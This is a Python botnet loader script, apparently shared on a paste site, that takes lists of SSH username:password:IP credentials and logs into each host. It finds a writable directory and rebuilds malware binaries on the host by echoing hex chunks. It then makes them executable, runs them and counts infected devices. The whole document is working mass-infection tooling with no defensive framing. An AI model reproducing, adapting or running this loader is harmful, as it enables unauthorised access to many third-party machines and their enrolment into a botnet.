SSH ECHOLOADER FOR 2022 APRIL [ENJOY]

1. #!/usr/bin/python
2. #Phaaaat hax SSH loader by Freak AKA Milenko
3.  
4. import sys, re, os, paramiko, socket, time
5. from threading import Thread
6. from time import sleep
7.  
8. if len(sys.argv) < 2:
9.     sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
10.  
11. paramiko.util.log_to_file("/dev/null")
12. rekdevice="payload" #command to send
13. print "\033[31m"
14.  
15. print "S-S-SUUUPER fast SSH loader by Milenko"
16. print
17. #simply find and replace newlines to :: then a newline so every IP starts with ::. It will scan those for port 22 or whatever your skiddie heart desires </3
18. print "Reads user:pass:ip and simply checks the IP for port 22."
19. print "Then writes loads the bonet onto it and saves the logins with SSH running to \"sshopen.txt\""
20. print "It is VERY fast and extremely efficient."
21. print "As it splits the file into equal chunks for each thread!"
22.  
23. threads = int(raw_input("Threads: "))
24.  
25. lines = open(sys.argv[1],"r").readlines()
26.  
27. fh = open("sshopen.txt","a+")
28.  
29. def chunkify(lst,n):
30.     return [ lst[i::n] for i in xrange(n) ]
31.  
32. running = 0
33. global loaded
34. loaded = 0
35.  
36. def printStatus():
37.     while 1:
38.         sleep(10)
39.         print "\033[32m[\033[31m+\033[32m] Total eye pees loaded: " + str(loaded) + "\033[37m"
40.         if loaded >= 1000:
41.             print "Dayum u got sum phat hax brah :^}"
42.  
43. def split_utf8(s , n):
44.     assert n >= 4
45.     start = 0
46.     lens = len(s)
47.     while start < lens:
48.         if lens - start <= n:
49.             yield s[start:]
50.             return # StopIteration
51.         end = start + n
52.         while '\x80' <= s[end] <= '\xBF':
53.             end -= 1
54.         assert end > start
55.         yield s[start:end]
56.         start = end
57. def getfullOutput(stdout):
58.     output = ""
59.     for line in stdout.readlines():
60.         output+=line+"\n"
61.     return output
62. def haxit(ip,username,password,normal):
63.     global loaded
64.     try:
65.         final = 0
66.         port = 22
67.         ssh = paramiko.SSHClient()
68.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
69.         ssh.connect(ip, port = port, username=username, password=password, timeout=3)
70.         ssh.exec_command(rekdevice)
71.         if normal == 4:
72.             for activate in ["enable", "system", "shell", "sh", "cat | sh"]:
73.                 stdin, stdout, stderr = ssh.exec_command(activate)
74.                 output = getfullOutput(stdout)
75.                 if "$" in output or "#" in output:
76.                     normal = 0
77.                     break
78.             if normal == 0:
79.                 final = 1
80. #        print "\033[32m[\033[31m+\033[32m] Echoloading: " + ip + "\033[37m"
81.         stdin, stdout, stderr = ssh.exec_command("cd /tmp ; cd /home/$USER ; cd /var/run ; cd /mnt ; cd /root ; cd /")
82.         getfullOutput(stdout)
83.         stdin, stdout, stderr = ssh.exec_command("cat /proc/mounts;busybox cat /proc/mounts")
84.         mounts = getfullOutput(stdout).split("\n")
85.         for line in mounts:
86.             try:
87.                 path = line.split(" ")[1]
88.                 if " rw" in line:
89.                     stdin, stdout, stderr = ssh.exec_command("echo -e '%s' > %s/.keksec; cat %s/.keksec;/bin/busybox cat %s/.keksec; rm %s/.keksec||/binbusybox rm %s/.keksec\n" % ( ("\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, path, path, path, path)))
90.                     if "AK47" in getfullOutput(stdout):
91.                         print "\033[32m[\033[31m+\033[32m] Found writeable direcory: " + ip + ":" + path + "\033[37m"
92.                         ssh.exec_command("cd %s" % path) #cd into the writeable directory
93.             except:
94.                 continue
95.         stdin, stdout, stderr = ssh.exec_command("/bin/echo -e \"\\x41\\x4b\\x34\\x37\"")
96.         if "AK47" in getfullOutput(stdout):
97.             normal = 1
98.         else:
99.             stdin, stdout, stderr = ssh.exec_command("/bin/busybox echo -e \"\\x41\\x4b\\x34\\x37\"")
100.             output = getfullOutput(stdout)
101.             if "AK47" in output:
102.                 normal = 2
103.             else:
104.                 stdin, stdout, stderr = ssh.exec_command("echo -e \"\\x41\\x4b\\x34\\x37\"")
105.                 output = getfullOutput(stdout)
106.                 if "AK47" in output:
107.                     normal = 3
108.                 else:
109.                     if final:
110.                         print "\033[32m[\033[31m+\033[32m] NO ECHO FOUND!!! -> " + ip + "\033[37m"
111.                         return
112.                     haxit(ip,username,password,4)
113.         for file in os.listdir("bins"):
114.             f=open("bins/" + file,"rb")
115.             for hex in split_utf8(f.read(), 128):
116.                 if normal == 1:
117.                     ssh.exec_command("echo -ne " + ''.join(map(lambda c:'\\\\x%02x'%c, map(ord, hex))) + " >> " + file)
118.                 if normal == 2:
119.                     ssh.exec_command("/bin/busybox echo -ne " + ''.join(map(lambda c:'\\\\x%02x'%c, map(ord, hex))) + " >> " + file)
120.                 if normal == 3:
121.                     ssh.exec_command("echo -ne " + ''.join(map(lambda c:'\\\\x%02x'%c, map(ord, hex))) + " >> " + file)
122.             ssh.exec_command("chmod 777 " + file + "|| /bin/busybox chmod 777 " + file + "||/bin/chmod 777 " + file)
123.             stdin, stdout, stderr = ssh.exec_command("./" + file)
124.             if "PERROR" in getfullOutput(stdout):
125.                 print "\033[32m[\033[31m+\033[32m] INFECTED: " + ip + "\033[37m"
126.         loaded += 1
127.         ssh.close()
128.     except Exception as e:
129.         print str(e)
130.         pass
131.  
132. def check(chunk, fh):
133.     global running
134.     running += 1
135.     threadID = running
136.     for login in chunk:
137.         if login.startswith("DUP"):
138.             continue # skip DUPS cause fuck em
139.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
140.         s.settimeout(3)
141.         try:
142.             s.connect((login.split(":")[0], 22))
143.             s.close()
144.             print "\033[32m[\033[31m+\033[32m] " + login + " has SSH open. Loading..."
145.             haxit(login.split(":")[0], login.split(":")[1], login.split(":")[2], -1)
146.             fh.write(login + "\r")
147.             fh.flush()
148.         except:
149.             pass
150.     print "\033[32m[\033[31m+\033[32m] Thread " + str(threadID) + " has finished scanning " + str(len(chunk)) + " IPs. Loaded: " + str(loaded)
151.     running -= 1
152.  
153. lines = map(lambda s: s.strip(), lines) # remove all newlines
154.  
155. chunks = chunkify(lines, threads) # make seperate chunk for each thread
156.  
157. print "STARTING SCAN AND LOAD!!!"
158.  
159. Thread(target = printStatus, args = ()).start()
160.  
161. for thread in xrange(0,threads):
162.     if thread >= 384:
163.         time.sleep(0.2)
164.     try:
165.         Thread(target = check, args = (chunks[thread], fh,)).start()
166.     except:
167.         pass
168. print "Scanning... Press enter 3 times to stop."
169.  
170. for i in range(0,3):
171.     raw_input("")
172.  
173. fh.close()
174.  
175. os.kill(os.getpid(),9)
176.